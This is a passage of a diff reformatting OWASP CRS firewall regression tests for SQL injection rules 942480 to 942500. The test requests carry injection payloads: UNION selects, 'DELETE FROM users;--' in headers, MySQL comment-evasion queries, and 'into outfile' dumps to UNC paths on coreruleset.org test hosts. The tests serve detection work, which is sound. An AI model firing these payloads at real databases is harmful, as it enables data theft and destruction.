no-store, must-revalidate" # variable name boundary attacks uri: "/get?'msdasql'" version: HTTP/1.0 output: log_contains: "id \"942480" - - test_title: 942480-2 + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c42b..1f4a15f8c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -2,380 +2,356 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942490.yaml tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f874c..2e5c69a02 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -2,86 +2,80 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 